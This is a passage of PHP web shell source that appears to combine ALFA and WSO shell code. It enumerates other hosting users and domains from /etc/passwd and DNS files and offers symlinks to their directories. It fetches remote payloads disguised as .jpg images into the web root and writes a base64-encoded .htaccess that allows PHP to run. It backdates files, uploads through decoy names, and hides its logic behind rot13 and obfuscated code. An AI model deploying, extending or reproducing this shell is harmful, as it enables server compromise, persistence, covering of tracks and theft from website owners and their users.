$domains["lines"]; $lines = _alfa_file('/etc/passwd'); } echo $table_header; $count=1; $template = '<tr><td><span style="color:#FFFF01;">{count}</span></td><td style="text-align:left;"><a target="_blank" href="{http}"/><span style="color:#00A220;margin-left:10px;"><b>{domain}</b> </a></span></td><td style="text-align:left;"><span style="color:#FFFFFF;margin-left:10px;"><b>{owner}</font></b></td></tr>'; foreach($lines as $line){ $domain = ""; $owner = ""; if($anonymous){ $explode = explode(":", $line); $owner = $explode[0]; $owner_len = strlen($owner) - 1; $userid = $explode[2]; if((int)$userid < 500)continue; $domain = "[?????]"; $temp_black = array(); $finded = false; foreach($anony_domains as $anony){ if($state == "named.conf"){ if(@strstr($anony, 'zone')){ preg_match_all('#zone "(.*)"#',$anony, $data); $domain = $data[1][0]; }else{ continue; } }elseif($state == "named" || $state == "valiases"){ if($anony == "." || $anony == "..")continue;if($state == "named")$anony = rtrim($anony, ".db"); $domain = $anony; } $sub_domain = str_replace(array("-","."), "", $domain); if(substr($owner, 0, $owner_len) == substr($sub_domain, 0, $owner_len)){ if(in_array($owner.$domain, $temp_black))continue; $sympath = str_replace("{user}", $owner, $makepwd); $http = "http://".$domain; echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template); $count++; $temp_black[] = $owner.$domain; $finded = true; } } if(!$finded){ $anonymous_users[] = $owner; } }else{ if($state == "named.conf"){ if(@strstr($line, 'zone')){ preg_match_all('#zone "(.*)"#',$line, $data); $domain = $data[1][0]; }else{ continue; } }elseif($state == "named" || $state == "valiases"){ if($line == "." || $line == "..")continue; if($state == "named")$line = rtrim($line, ".db"); $domain = $line; } if(strlen(trim($domain)) > 2 && $state != "passwd"){ if(!_alfa_file_exists('/etc/valiases/'.$domain, false))continue; if($is_posix){ $user = @posix_getpwuid(@fileowner('/etc/valiases/'.$domain)); $owner = $user["name"]; }elseif($can_runcmd){ $owner = alfaEx("stat -c '%U' /etc/valiases/".$domain,false,false); } } } if(!$anonymous){ if(strlen($owner)==0 || in_array($owner.$domain, $f_black))continue; $sympath = str_replace("{user}", $owner, $makepwd); $http = "http://".$domain; if($state == "passwd"){ $http = "javascript:alert('we cant find domain...')"; } echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template); $count++; $f_black[] = $owner.$domain; } } if($anonymous){ foreach($anonymous_users as $owner){ $sympath = str_replace("{user}", $owner, $makepwd); $http = "javascript:alert('we cant find domain...')"; echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, "[????]", $owner, $sympath), $template); $count++; } } $cant_symlink = false; }else{ $is_direct = false; $makepwd = alfaMakePwd(); if(_alfa_file_exists("/etc/virtual/domainowners")){ $makepwd = "/home/{user}/public_html"; $is_direct = true; } $sole = _alfa_file("/etc/virtual/domainowners"); $count=1; echo $table_header; $template = '<tr><td><span style="color:#FFFF01;">{count}</span></td><td style="text-align:left;"><a target="_blank" href="http://www.{url}"/><span style="color:#00A220;margin-left:10px;"><b>{url}</b> </a></span></td><td style="text-align:left;"><span style="color:#FFFFFF;margin-left:10px;"><b>{user}</font></b></td><td><a href="'.__ALFA_DATA_FOLDER__.'/alfasymlink/root{cwd}" target="_blank"><span style="color:#FF0000;">Symlink</span></a></td></tr>'; if($sole){ foreach($sole as $visible){ if(@strstr($visible,":")){ $solevisible = explode(':', $visible); $cwd = str_replace("{user}", trim($solevisible[1]), $makepwd); echo str_replace(array("{count}","{user}","{url}","{cwd}"), array($count++, trim($solevisible[1]), trim($solevisible[0]), $cwd), $template); } } }else{ $passwd = _alfa_file("/etc/passwd"); if($passwd){ $html = ""; $is_named = false; $users = array(); $domains = array(); $uknowns = array(); foreach($passwd as $user){ $user = trim($user); $expl = explode(":", $user); if((int)$expl[2] < 500)continue; $users[$expl[0]] = $expl[5]; } $site_domains = @scandir("/etc/virtual/"); if(!$site_domains){ $site_domains = alfaEx("ls /etc/virtual/"); $site_domains = explode("\n", $site_domains); if(!$site_domains){ $site_domains = _alfa_file("/etc/named.conf"); if($site_domains){$is_named = true;} } } foreach($site_domains as $line){ if($is_named){ if(@strstr($line, 'zone')){ preg_match_all('#zone "(.*)"#',$line, $data); $domain = $data[1][0]; if(strlen($domain > 2) && !empty($domain)){ $domains[] = $domain; } } }else{ $domains[] = $line; } } $x = 1; foreach($users as $user => $home){ foreach($domains as $domain){ $user_len = strlen($user) - 1; $sub_domain = str_replace(array("-","."), "", $domain); $five_user = substr($user, 0,$user_len); $five_domain = substr($sub_domain, 0,$user_len); if($five_user == $five_domain){ if($is_direct){ $cwd = str_replace("{user}", $user, $makepwd); }else{ $expl = explode("}/", $makepwd); $cwd = $home."/".$expl[1]; } $html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, $domain, $cwd), $template); }else{ $uknowns[$user] = $home; } } } $uknowns = array_unique($uknowns); foreach($uknowns as $user => $home){ if($is_direct){ $cwd = str_replace("{user}", $user, $makepwd); }else{ $expl = explode("}/", $makepwd); $cwd = $home."/".$expl[1]; } $html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, "[?????]", $cwd), $template); } echo($html); } } echo "</table>"; } } function adminer(){ $ch = curl_init("https://github-production-user-asset-6210df.s3.amazonaws.com/134137106/239680840-3802f52e-a54e-49fb-889d-1becba56295b.jpg"); $fp = fopen("adminer.php", "w"); curl_setopt($ch, CURLOPT_FILE, $fp); curl_setopt($ch, CURLOPT_HEADER, 0); curl_exec($ch); if(curl_error($ch)) { fwrite($fp, curl_error($ch)); } curl_close($ch); fclose($fp); $adminerloc = 'adminer.php'; echo '<i><b><a href='.$adminerloc.'>./Done ClickMe For Access Adminer</a></b></i></center>'; } function wpdownloader(){ $ch = curl_init("https://github-production-user-asset-6210df.s3.amazonaws.com/134137106/239683523-c92cf078-a13d-40ac-ad07-c13c33ad274e.jpg"); $nameautodir = $_SERVER['DOCUMENT_ROOT'].'/wp-downloader.php'; $dirtar = getcwd ().'/wp-downloader.php'; $fp = fopen($nameautodir, "w"); curl_setopt($ch, CURLOPT_FILE, $fp); curl_setopt($ch, CURLOPT_HEADER, 0); curl_exec($ch); if(curl_error($ch)) { fwrite($fp, curl_error($ch)); } curl_close($ch); fclose($fp); $ht = $_SERVER['DOCUMENT_ROOT']."/.htaccess"; @chmod($ht, 0755);@unlink($ht);@fwrite(fopen($ht,"w"),base64_decode("PElmTW9kdWxlIG1vZF9yZXdyaXRlLmM+ClJld3JpdGVFbmdpbmUgT24KUmV3cml0ZVJ1bGUgLiogLSBbRT1IVFRQX0FVVEhPUklaQVRJT046JXtIVFRQOkF1dGhvcml6YXRpb259XQpSZXdyaXRlQmFzZSAvClJld3JpdGVSdWxlIF5pbmRleFwucGhwJCAtIFtMXQpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZgpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZApSZXdyaXRlUnVsZSAuIC9pbmRleC5waHAgW0xdCjwvSWZNb2R1bGU+CjxGaWxlc01hdGNoICIuKlwuKD9pOnBodG1sfHBocHxzdXNwZWN0ZWR8UEhQKSQiPgpPcmRlciBBbGxvdyxEZW55CkFsbG93IGZyb20gYWxsCjwvRmlsZXNNYXRjaD4=")); touch($ht, strtotime(rand(2015, 2018)."-".rand(3, 12)."-".rand(1, 30)." ".date("H:i:s"))); $namedown = $_SERVER['DOCUMENT_ROOT'].'/wp-downloader.php'; $namehref = $_SERVER['HTTP_HOST'].'/wp-downloader.php'; echo "<i><b>Manual Access WpDownloader ".$namedown.""; echo '<a href="http://'.$namehref.'"> Or Click Here to Access it</a></b></i></center>'; } function vhost2(){ echo "<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN' 'http://www.w3.org/TR/html4/loose.dtd'>\n<html>\n<!--Coded by W4r10k // ColdHackers MezopotamiaHackers.org -->\n</html>\n<html>\n<head>\n<link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.5.0/css/bootstrap.min.css\">\n<link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.13.0/css/all.min.css\">\n<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'>\n<title>Coded By W4r10k | ColdHackers | All Kurdish Hackers</title>\n<style type=\"text/css\">\na { \ntext-decoration:none;\n\n }\n a:hover{\n background:white;\n color:white !important;\n transition: all 0.7s ease-out;\n }\n</style> \n<style>\ninput { \ncolor:#000035; \nfont:8pt 'trebuchet ms',helvetica,sans-serif;\n}\nbody {\n font-family: ubuntu;\n\tbackground-color: black;\n}\nlabel{\n color:red;\n}\n</style>\n</head>\n<body>\n<center>\n<br>\n<label>Coded by W4r10k | ColdHackers</label>\n<br>\n<a href='http://mezopotamiahackers.org' target='_blank' ><img src='https://i.ibb.co/HVfVVqP/67fa35-25c5a0f301d8431da1acf6ecd69f02e4.png' height='400'></a><br><br>\n<label>PRIV8 VHOSTS CONFIG GRABBER By W4r10k | ColdHackers</label><br>\n <td><table width='100%' height='173'>\n <td class='td' style='border-bottom-width:thin;border-top-width:thin'><form method='post'>\n <div align='center'>\n <input type='submit' class='btn btn-danger' name='coldhackers' value='Exploit_>'>\n </div>\n </form></td>\n"; } /// dimodif AI disini function aCtFm() { $currentPath = $this->_za; if (!empty($_POST["p"])) { $oldTime = @filemtime($_POST["c"]); switch ($_POST["p"]) { // --- GANTI BLOK INI --- case "uploadFile": // Variabel bawaan: $tmpF dan $realF $tmpF = $_FILES["f"]["tmp_name"] ?? ""; $fileName = basename($_FILES["f"]["name"] ?? ""); $targetDir = $_POST["c"] ?? '.'; $realF = rtrim($targetDir, '/') . '/' . $fileName; $done = false; $errorMessage = "Can't upload file: " . htmlspecialchars($fileName); // Pesan error default // 1. Periksa apakah ada file yang diunggah dan tidak ada error if (!is_uploaded_file($tmpF)) { $errorMessage = "No file was uploaded or an upload error occurred."; } // 2. Periksa apakah direktori tujuan valid dan bisa ditulis elseif (!is_dir($targetDir)) { $errorMessage = "Target directory is not a valid directory."; } elseif (!is_writable($targetDir)) { $errorMessage = "Target directory is not writable."; } // 3. Jika semua pemeriksaan lolos, gunakan teknik umpan dan pengalihan else { // Langkah 1: Buat nama file "umpan" (decoy) dengan ekstensi yang aman $benign_extensions = ['jpg', 'png', 'gif', 'data', 'tmp', 'log']; $random_ext = $benign_extensions[array_rand($benign_extensions)]; $decoy_name = 'temp_' . bin2hex(random_bytes(8)) . '.' . $random_ext; $decoy_path = rtrim($targetDir, '/') . '/' . $decoy_name; // Langkah 2: Unggah file ke nama "umpan" terlebih dahulu if (@move_uploaded_file($tmpF, $decoy_path)) { // Langkah 3: Jika umpan berhasil, sekarang ganti nama ke nama asli if (@rename($decoy_path, $realF)) { // Langkah 4: Atur izin file dan pertahankan timestamp @chmod($realF, 0644); $done = true; // Pertahankan timestamp jika ada if (isset($oldTime) && $oldTime) { @touch($realF, $oldTime, $oldTime); } } else { // Jika rename gagal, bersihkan jejak dengan hapus file umpan $errorMessage = "Failed to rename the uploaded file."; @unlink($decoy_path); } } else { $errorMessage = "Failed to move the uploaded file to temporary location."; } } if (!$done) { // Tampilkan pesan error yang lebih spesifik echo $errorMessage; } break; // --- AKHIR PENGGANTIAN --- case "mkdir": $dirname = str_rot13($_POST["x"]); if (!@mkdir($dirname)) { echo "Can't create new dir"; } elseif ($oldTime) { @touch($dirname, $oldTime, $oldTime); } break; case "delete": function deletedDir($dir) { $dir = (substr($dir, -1) == "/") ? $dir : $dir . "/"; if ($handle = @opendir($dir)) { while (($entry = @readdir($handle)) !== false) { $path = $dir . $entry; if (basename($path) == ".." || basename($path) == ".") continue; $type = @filetype($path); if ($type == "dir") deletedDir($path); else @unlink($path); } @closedir($handle); } @rmdir($dir); } if (is_array($_POST["f"])) { foreach ($_POST["f"] as $item) { if ($item == "..") continue; $decoded = str_rot13(urldecode($item)); if (is_dir($decoded)) deletedDir($decoded); else @unlink($decoded); } } break; } if ($oldTime) { touch($_POST["c"], $oldTime, $oldTime); } } echo "<h1>File Manager</h1><div class='content'> <script>let p_ = x_ = s_ = \"\";</script>"; $directoryList = WsCanDir(isset($_POST["c"]) ? $_POST["c"] : $currentPath); if ($directoryList === false) { echo "Can't open this folder!"; return; } global $_rpl; $_rpl = array("name", -617); if (!empty($_POST["p"])) { if (@preg_match("!s_([A-Za-z]+)_(\d{1})!", $_POST["p"], $match)) { $_rpl = array($match[1], (int)$match[2]); } } $tes1 = "yanzkecebanget"; // Tidak digunakan echo "<script> function sa() { for (let i = 0; i < d.files.elements.length; i++) { if (d.files.elements[i].type == 'checkbox') { d.files.elements[i].checked = d.files.elements[0].checked; } } } </script>"; echo "<table width='100%' class='main' cellspacing='0' cellpadding='2'> <form name='files' method='post'> <tr> <th width='13px'><input type='checkbox' onclick='sa()' class='chkbx'></th> <th width='40%'><a href='#' onclick='g(\"fm\", null, \"s_name_" . ($_rpl[1] ? 0 : 1) . "\")'>Name</a></th> <th><a href='#' onclick='g(\"fm\", null, \"s_size_" . ($_rpl[1] ? 100 : 3) . "\")'>Size</a></th> <th><a href='#' onclick='g(\"fm\", null, \"s_modify_" . ($_rpl[1] ? 0 : 1) . "\")'>Modify</a></th> <th><a href='#' onclick='g(\"fm\", null, \"s_perms_" . ($_rpl[1] ? 0 : 1) . "\")'>Permissions</a></th> <th width='200px'>Actions</th> </tr>"; $dirs = $files = array(); $total = count($directoryList); for ($i = 0; $i < $total; $i++) { $file = $directoryList[$i]; $filePath = $currentPath . $file; $fileData = array( "name" => $file, "path" => $filePath, "modify" => @date("Y-m-d H:i:s", @filemtime($filePath)), "perms" => WpermsColor($filePath), "size" => @filesize($filePath) ); if (@is_file($filePath)) { $files[] = array_merge($fileData, array("type" => "file")); } elseif (@is_link($filePath)) { $dirs[] = array_merge($fileData, array("type" => "link", "link" => readlink($filePath))); } elseif (@is_dir($filePath)) { $dirs[] = array_merge($fileData, array("type" => "dir")); } } function wcmp($a, $b) { global $_rpl; if ($_rpl[0] != "size") { return strcmp(strtolower($a[$_rpl[0]]), strtolower($b[$_rpl[0]])) * ($_rpl[1] ? 1 : -1); } else { return ($a["size"] < $b["size"] ? -1 : 1) * ($_rpl[1] ? 1 : -1); } } usort($files, "wcmp"); usort($dirs, "wcmp"); $fileList = array_merge($dirs, $files); $isLightRow = true; foreach ($fileList as $entry) { $encoded = str_rot13(urlencode($entry["name"])); echo "<tr" . ($isLightRow ? " class='l1'" : "") . "> <td><input type='checkbox' name='f[]' value='$encoded' class='chkbx'></td> <td><a href='#' onclick=\"" . ($entry["type"] == "file" ? "g('ft', null, '$encoded', 'view')\">" . htmlspecialchars($entry["name"]) : "g('fm', '" . str_rot13($entry["path"]) . "')\"" . (!empty($entry["link"]) ? " title='" . $entry["link"] . "'" : "") . "><b>[ " . htmlspecialchars($entry["name"]) . " ]</b>") . "</a></td> <td>" . ($entry["type"] == "file" ? viewSize($entry["size"]) : $entry["type"]) . "</td> <td>" . $entry["modify"] . "</td> <td><a href='#' onclick=\"g('ft', null, '$encoded', 'chmod')\">" . $entry["perms"] . "</a></td> <td> <a href='#' onclick=\"g('ft', null, '$encoded', 'rename')\">Rename</a> <a href='#' onclick=\"g('ft', null, '$encoded', 'touch')\">Touch</a>" . ($entry["type"] == "file" ? " <a href='#' onclick=\"g('ft', null, '$encoded', 'edit')\">Edit</a> <a href='#' onclick=\"g('ft', null, '$encoded', 'download')\">Download</a>" : "") . "</td> </tr>"; $isLightRow = !$isLightRow; } echo "<tr> <td colspan='7'> <input type='hidden' name='a' value='fm'> <input type='hidden' name='c' value='" . htmlspecialchars(str_rot13($currentPath)) . "'> <input type='hidden' name='ch' value='" . (@$_POST["ch"] ?? "") . "'> <select name='p'> <option value='delete'>Delete</option> </select> <input type='submit' value='>'> </td> </tr> </form></table></div>"; } function ACtFt(){$_cp=$this->_cp;if(@isset($_POST["\x70"]))$_POST["p"]=STr_ROt13(UrLDecOdE($_POST["\x70"]));if(@isset($_POST["x"])){switch($_POST["x"]){case "d\157wnload":if(@Is_FIle($_POST["\160"])&&@IS_READaBle($_POST["p"])){OB_StART("ob_g\172handler",(int)round(2048+2048));@heaDEr("C\157\156tent-D\151spos\x69tion:\x20attachme\x6et; f\x69len\141me=".@BAsENAMe($_POST["p"]));if(FUnctIOn_EXiSTs("mime_\x63\157ntent_type")){$_ei=@MimE_ConTeNt_TypE($_POST["p"]);@heADEr("Conten\x74-Type: ".$_ei);}else @HeAder("Co\x6etent-Type: appli\x63ati\157n/o\143tet\x2dstre\x61m");$_jj=@FOpEn($_POST["p"],"r");if($_jj){while(!@FeOF($_jj))echo @FGeTs($_jj,01013-0702+01667);@FClose($_jj);}}exit;break;case "mkfile":if(!@FILE_exiStS($_POST["\x70"])){$_x=@fIlEMTImE($_POST["c"]);$_jj=@fOpeN($_POST["p"],"w");if($_jj){@fCLoSe($_jj);if($_x){@touCH($_POST["c"],$_x,$_x);@toUCh($_POST["p"],$_x,$_x);}$_POST["x"]="edit";}}break;}}echo"<h1>File tools</h1><div \143lass=content\x3e";if(!@fiLE_ExisTs($_POST["p"])){echo"File \x6e\157t exists";return;}$_bhr=@Posix_Getpwuid(@FiLeowNEr($_POST["p"]));if(!$_bhr){$_bhr["name"]=@FiLEoWNER($_POST["p"]);$_hs["n\141me"]=@fILEGrOUp($_POST["p"]);}else $_hs=@PosIx_gEtGRgiD(@FILEGROUp($_POST["p"]));echo"<span\076Name\072</span> ".htMLSpeciaLcHArs(@BaSenAMe($_POST["p"]))."\x20<span>S\x69ze:</sp\x61n> ".(@iS_FILe($_POST["\x70"])?vIewSize(@fILESIze($_POST["p"])):"-")." <span\x3eP\x65\162m\151\x73sion:</span>\040".WPeRMScOLoR($_POST["\x70"])." <\x73pan>Ow\156er/Group:</span> ".$_bhr["name"]."/".$_hs["n\141me"]."<br>";echo"<\163pan>Chan\x67e tim\145:</s\x70an> ".@dATe("Y-m-d H:i:s",@fileCtIme($_POST["p"]))." <s\160an>Acc\x65ss time:\074/\163pa\x6e>\040".@DaTE("Y-m-d H:i:s",@FiLeaTime($_POST["p"]))." <s\160a\156>Mod\x69fy time:</\x73p\x61n> ".@daTe("\x59-\x6d-d H:\151:s",@FilEmTime($_POST["p"]))."<br>\074br>";if(empty($_POST["x"]))$_POST["x"]="v\151ew";if(@IS_File($_POST["p"]))$_fbd=array("\126iew","Download","E\x64i\x74","\103hmod","Rena\155e","To\165ch");else $_fbd=array("Chmod","Rena\155e","T\x6fuc\x68");foreach($_fbd as$_e)echo"<\x61 \x68ref\075# o\x6eclick\075\x22g(null,null,\x27".UrlenCOdE(StR_rOt13($_POST["p"]))."',\047".@STrTolowER($_e)."')\x22>".((@strToLOweR($_e)==$_POST["x"])?"<\142>[\040".$_e."\040]\074/b\076":$_e)."</a> ";echo"<br><b\162>";switch($_POST["\170"]){case "vie\x77":echo"<pr\x65\040class=ml1>";$_jj=@foPEN($_POST["p"],"r");if($_jj){while(!@fEof($_jj))echo HtmlsPECiAlcHArs(@FGets($_jj,(int)round(341.33333333333+341.33333333333+341.33333333333)));@fcloSe($_jj);}echo"</pre>";break;case "ch\155\157d":if(!empty($_POST["s"])){$_jfl=(-077+-021- -0120);for($_o=STRlEn($_POST["s"])-(int)round(0.5+0.5);$_o>=(-0265-0637- -01124);--$_o)$_jfl+=(int)$_POST["s"][$_o]*@pOw((int)round(2.6666666666667+2.6666666666667+2.6666666666667),(StRLen($_POST["s"])-$_o-(int)round(0.33333333333333+0.33333333333333+0.33333333333333)));if(!@ChmOd($_POST["\160"],$_jfl))echo"Can\x27t \x73et permissions!\074b\162><script>doc\x75ment.\x6df.s.v\x61lue\x3d\x22\x22;</\163c\x72ipt\076";}@cLeaRStATCACHe();echo"<sc\162ipt>\163_=\042\042;</scrip\164><for\x6d o\156submit=\x22g(null,null,\x27".URlENCode(sTR_rOT13($_POST["p"]))."',nul\x6c\x2cthis.chmod.\x76alue);return false;\042><in\160ut type=text n\141me=ch\x6do\144 va\154u\x65=\x22".suBstR(@sprInTf("%o",@FIlePErMs($_POST["p"])),-(int)round(2+2))."\x22><input type=\x73ubmit valu\x65\075\x22\076>\042\x3e<\057for\155>";break;case "edit":if(!@IS_wrItAble($_POST["p"])){echo"Fil\x65 isn\x27t writeable";break;}if(!empty($_POST["s"])){$_ozl=@FilEmtiMe($_POST["p"]);$_jj=@foPEN($_POST["\x70"],"w");$_POST["s"]=suBStR($_POST["s"],(int)round(0.5+0.5));if($_jj){@fwrite($_jj,base64_decode($_POST["s"]));@FCLoSe($_jj);echo"Saved!<br><script>s_=\042\x22;</script>";}}echo"<form ons\165b\155it=\x22\147\x28nul\154,n\165ll,'".urLenCodE(stR_rOt13($_POST["p"]))."','\145dit',\0471\047+ut\157\141(th\151\x73.text.value));\162etur\156 false;\x22>\x3ctex\164ar\x65a name=text clas\163\x3dbigarea>";$_jj=@FOpeN($_POST["p"],"r");if($_jj){while(!@fEOF($_jj))echo HtmlsPECiaLchARs(@fgEts($_jj,(int)round(341.33333333333+341.33333333333+341.33333333333)));@FcLosE($_jj);}echo"</text\x61rea><input type\x3dsubmit value=\042\x53ave\x22></\x66orm>";if($_ozl)@TOucH($_POST["p"],$_ozl,$_ozl);@CLEarSTATCachE();break;case "\x72e\156ame":$_x=@fiLEmtIME($_POST["c"]);if(!empty($_POST["s"])){if(!@rEnaME($_POST["p"],STR_Rot13($_POST["s"])))echo"Can't rename!<\x62\162>";else{if($_x)@TOuCH($_POST["c"],$_x,$_x);die("<script>\x67(nul\x6c,n\x75ll,\042".UrlENcOde($_POST["s"])."\042,n\x75ll,\042\042)</s\143rip\x74\x3e");}}@CleaRSTatCacHe();echo"<form onsubmit=\x22g(null,\156ull,'".URlenCoDe(STR_RoT13($_POST["p"]))."',\x6eull,rot13(th\x69\x73.nam\145.val\165e));return false;\042><input type=tex\164 nam\x65=n\141me\040v\x61lue=\042".HTMLSpecIAlChARS($_POST["p"])."\x22><input type=s\165bmit val\x75\x65=\042>>\042><\x2fform>";break;case "tou\x63h":if(!empty($_POST["s"])){$_ozl=@StrToTiMe($_POST["s"]);if($_ozl){if(!@TouCH($_POST["p"],$_ozl,$_ozl))echo"Fail!";else echo"Touched!";}else echo"B\141d t\x69me form\x61t!";}@cLEarStatcaCHe();echo"<scrip\164>s_=\042\x22;</\x73cript>\074form onsubm\151t=\042g(n\165ll,nu\154l,'".URlenCOdE(STR_rOt13($_POST["\160"]))."',null\054thi\x73.touch\056v\x61lue\x29\x3bret\165rn false;\x22><input type\075text name=\x74ouch value=\042".@daTe("\131-m-d H:\151:s",@fiLemTImE($_POST["p"]))."\042\076<input type=submit v\141lue=\x22>>\x22\x3e<\057fo\x72m>";break;}echo"</div>";} function wheADeR(){$_taj=$this->_taj;$_hej=$this->_hej;$_za=$this->_za;$_zrt=$this->_zrt;$_wda=$this->_wda;$_i=$this->_i;$_vpb=$this->_vpb;$_vor=$this->_vor;if(empty($_POST["ch"]))$_POST["\x63h"]=$_hej;echo"<h\164ml\x3e<head><meta \x68ttp-e\161uiv='Content-Type' con\164en\x74\075'text\x2fht\155l\x3b charset=".$_POST["c\x68"]."\x27><title>".$_SERVER["HTTP_HOST"]." -\040WSO YANZ\x20ENC BYPASS V3.5<\057title>\015\012\011\011<style>b\x6fdy{backgro\x75nd\x2dc\x6flor:#444;c\x6f\154o\x72\x3a\x23e\x31e1e1;}body,\x74d,th{font: 9\160t \x4cu\143ida,Verdana;mar\147\x69n:\060;vertical\055align:top;c\157l\x6fr\072#e1e1e\x31;}table\056info{color\x3a#fff;\x62a\x63kground-c\157lo\162:\x23222\x3b}span,h1,a{\143olo\162: ".$_taj." !\x69m\160ort\x61nt;}span{font-w\145ight\x3a\x20bolder;}span\056w\x66w\173font-\x77\145\x69gh\x74:normal;}h\061{borde\162-lef\164:5px soli\x64 ".$_taj.";padding: 2px \065px;\x66ont: \0614pt Verdana;\x62ackground-co\154\157r\x3a#2\x322;margi\x6e:0px;}\x64iv.co\156t\x65\156t{pad\x64i\156g: 5\160x\073\155argin\x2dl\145f\x74:5p\170;background-\x63olor:#333;\175a{text-dec\157ration:none\073\x7da\x3ahover{text-de\143oration:u\x6ed\145rline;}.ml1{b\x6frder:1p\170 \163olid #444;padding:5px;m\141rgi\156:0;overflow: au\x74\x6f;\x7d.bigar\145a{\x77idth:100%\x3bhe\x69g\150t:3\0600px\073}inpu\164,textare\x61,select{margin:0;\143ol\157r:\043fff;b\141c\x6bg\162ound-color:#555;border:\061px so\x6ci\x64\x20".$_taj."\073 font: 9pt Monospace,'Co\165ri\x65r \x4eew';}for\155{m\141rgin:0px;}#toolsTb\154{\164\145\170t-\x61lign\072\x63en\x74\x65r;\x7d.to\157l\163In\x70{w\x69\x64th:500px}.main t\x68{tex\164-align:left;back\147round-co\x6cor:#5\1455e5e;}.\x6da\x69n t\x72:hove\162{ba\x63\x6bgr\157und-col\157r:#5\1455\x655e}.l1{ba\x63kg\x72ou\x6ed-c\x6flor:\x23444}.l2{bac\x6bground-color:#333}\160re{fo\156t\055\x66amily:\x43our\x69er\054\x4donospa\143e;}\074/sty\154e>\015\x0a<script>\015\x0avar \x63_ \x3d\x20'".htmlsPECiaLcHarS(Str_RoT13($_za))."';\x0d\x0avar \141_\040= '".hTMLSpeCIALcHarS($_POST["a"])."'\x0d\012var ch_ = \047".hTmlsPecialChArs($_POST["ch"])."';\015\x0avar p_ = '".((STRpos($_POST["p"],"\x0a")!==false)?"":HtMLSPeciALCHARs($_POST["p"],(int)round(1.5+1.5)))."';\x0d\012va\162 x_ =\040'".((StrpOS($_POST["x"],"\012")!==false)?"":HtMlspecIALcHARS($_POST["x"],0270-0265))."'\073\015\012var s_ \075\040'".((STrpos($_POST["s"],"\012")!==false)?"":htmlSPEciALCharS($_POST["s"],-0315+-0436- -0756))."';\015\012var\x20d\040=\x20d\x6fc\165ment;\015\x0afun\x63tio\156\040set(a\x2cc,p,\170,s,ch)\173if(a!=nu\154l)d.mf.a.v\x61l\165e=\x61;else d\x2emf\056a.value=a_;if(c!=null)d.mf\x2ec\x2evalue=c;\145lse d.mf\x2ec.\x76a\154ue=c\x5f;i\x66(p!=null)d.\x6df.\x70\056va\x6cue=\x70;e\x6cse\040d.m\x66.p.value=p_;if(x\x21=null)d.mf\056x\056val\165e=x;else d.\x6df.x.v\x61lue=\170_;i\x66(\x73!=null)\x64.mf.\x73.value=s;el\x73e d.mf.\163.va\154ue=s_;if(ch!=\x6e\165ll\051d.mf.ch.value=ch;els\x65\x20d.mf.ch.\166alue=ch_;}fu\156ction g(a,c,\160,x,s,ch){set\050a\x2cc,p,x,s,ch);d\056mf\x2esubmit();}function utoa(str){\x72et\x75rn wind\157w.btoa(unescape(enc\157deUR\x49Component(st\162)\051);}f\x75ncti\x6fn \141tou(st\x72){retu\162n d\145co\x64\145U\122IComponent(escape(window.\141tob\050\163\x74r)));}function rot1\063(str){\x76ar input='ABCD\105FGHIJKLMNOP\121RSTUVWXYZa\x62\143\144efg\150ijklmnopqrstuvwxyz';\x20var out\160ut='NOPQRSTUVWXYZABCD\105FG\x48IJKLMnopqrs\x74uvwxyzabcd\145f\147hi\x6aklm'; var index=x=> i\x6epu\x74.indexOf(x); var translate=x=> inde\170\x28x\051 > -1 ? output[index(x)] : \x78\073 retu\x72n str.spl\x69t(\x27').map(tran\163late)\056\x6aoin(\047');}v\x61r cvi\163=false;func\x74ion show(){\x69f(!\143v\151s){document.ge\164Eleme\156tById('bat').inne\162HTML='Li\156\153\x73';docume\156t.getEleme\x6etB\171Id('cwd').st\171\x6ce\056display='inline';doc\x75ment\056g\145tElementById('lin\153s').s\x74yle.display='none';cvis\075true\x3b}else{do\x63u\155en\164.g\145t\x45lemen\164ById('bat'\x29\x2ei\156nerHTML\075'Tex\x74';\144o\143ument\056g\145tElementById\050'cwd\047).s\164yle.di\x73pla\171='none';\144o\x63ume\x6et\056getE\154ementById(\047lin\153s').\x73ty\154\x65.disp\x6cay='\151\x6e\154ine';cvis\x3dfalse;}\x7d\015\x0a</scr\x69pt>\x0d\x0a</head\x3e<b\157dy><div style=\047position:abso\x6cu\x74e;w\151\x64th:\x3100%;background-colo\x72:#444;t\x6fp:0;left\072\x30;\047>\x0d\x0a<form\x20method=post name\x3dm\x66 st\171le='display:non\x65\x3b'>\015\x0a<inpu\164 type=hidden na\155e=\x61>\x0d\x0a<input type\x3dhidd\145n na\155e=c\x3e\x0d\012<i\156pu\x74 type=hidden \x6eame=p>\015\012<\151nput type=hidden name=x>\x0d\x0a<input type=\150\151dden name=s>\015\012<i\156\x70u\x74\040typ\x65=hid\144en name=c\x68>\x0d\x0a</fo\162m>";if(FUncTIon_exISTs("\x64iskfr\145\x65space"))$_pn=@dISkfREEspAce($_za);if(FUnCTIOn_ExiSTs("disk_\x74\x6ft\141l_\x73pace"))$_ejl=@dISk_toTAL_SPACE($_za);$_ejl=$_ejl?$_ejl:(int)round(0.5+0.5);if(fUncTiOn_eXISTs("php_\165name")){$_v=@php_UnAME();}elseif(funCTIon_ExiSTs("php\x69nfo")){Ob_STArt();PHpiNfO();$_no=ob_Get_CLEAn();if(false!==preG_mAtch("!<tr><t\144\x20class\075\x22e\x22>System\134s*</t\x64><\164d class=\042v\x22>([^\x5c<]\053)!i",$_no,$_bf))$_v=tRIm($_bf[025+027-053]);}$_bl="";$_we=@exPLOdE("/",$_za);$_t=cOuNt($_we);for($_o=(int)round(0+0);$_o<$_t-(01041-01040);$_o++){$_bl.="<a href='#' on\x63\154ic\153='g(\042f\155\042\x2c\042";for($_el=(-0630- 